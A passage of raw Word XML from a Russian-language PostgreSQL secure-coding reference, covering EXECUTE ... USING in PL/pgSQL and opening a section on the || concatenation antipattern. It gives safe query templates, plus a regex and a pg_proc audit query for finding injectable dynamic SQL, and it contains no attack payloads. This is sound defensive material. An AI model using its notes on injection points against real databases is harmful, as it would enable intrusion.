        </w:rPr>
        <w:t>что USING НЕ закрывает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (identifier injection — нужен другой инструмент), (3) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>comparison с другими подходами</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (format/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для значений).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352A1A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74106B4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE...USING — доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (июль 2009). До 8.4 был только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'sql_string'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без USING — приходилось использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для escape values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F0FE1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpgsql функция строит dynamic SQL. USING-pattern предотвращает value-injection, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не identifier-injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.16.1/3.16.2/3.16.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C510DFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Большинство dynamic SQL в plpgsql использует USING для values. Канонические шаблоны (повторение для clarity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C920430" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 1: один identifier + один value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B79382" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT * FROM %I WHERE id = $1', tbl) USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2B59E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E74F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 2: identifier + несколько values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A309F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('UPDATE %I SET status = $1 WHERE id = $2', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A83E91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING new_status, row_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7535CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079D5CA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 3: schema + identifier + USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF74296" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT * FROM %I.%I WHERE owner = $1', sch, tbl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC253E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING current_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C189AFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE6A85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 4: INTO + USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49495A44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT count(*) FROM %I WHERE created_at &gt;= $1', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18B667" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INTO result_count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A3CC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING since_date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A49FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14D1B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Шаблон 5: RETURN QUERY EXECUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD2CEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURN QUERY EXECUTE format('SELECT * FROM %I WHERE n ILIKE $1', tbl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2571275D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING search_pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFD529" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A1261C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   USING сам по себе не уязвим. Признаки относятся к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отсутствию USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в коде, где value подставляется через concat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40046C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE\s+'[^']*'\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкатенация значения после EXECUTE без USING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F6792E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc LIKE '%EXECUTE%||%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc NOT LIKE '%USING%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функции с concat без USING. Требуют ручного аудита.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72939A4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... WHERE col = 'literal_value'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в EXECUTE-вычисленных SQL — индикатор embed-style, не bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393457B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2009). Поведение не менялось. Никакие фиксы не требуются — это design-feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD3A80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A30E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — identifier защита (parallel к value-защите 3.16.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2865A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — identifier alternative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7378F745" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — антипаттерн: где USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> был быть использован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B30456" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — где USING становится критичным (любой gap → RCE under owner).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BA0ADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>блокирует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Wire-Protocol bind не пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043FC643" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая reference по bind-параметризации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5BA21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E249E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939C216" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL 8.4 Release Notes (USING clause introduction) — https://www.postgresql.org/docs/release/8.4/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7B569" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wire Protocol: «Bind / Parse / Execute» — https://www.postgresql.org/docs/current/protocol-message-formats.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69575AE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   xflr6 SQL injection safe pattern (R18) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57464C7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   2ndQuadrant blog: «Dynamic SQL in PL/pgSQL» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF1670C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.4 Конкатенация через || — антипаттерн</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B1911" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Самый прямой и распространённый антипаттерн в plpgsql: построение dynamic SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>прямую конкатенацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оператором </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или USING. Внешне выглядит «простее» чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>каждый concat-point — потенциальная injection-точка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: identifier-injection (если concat имени таблицы/колонки), value-injection (если concat значения с одинарными кавычками), full SQL injection (если concat WHERE-фрагмента). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
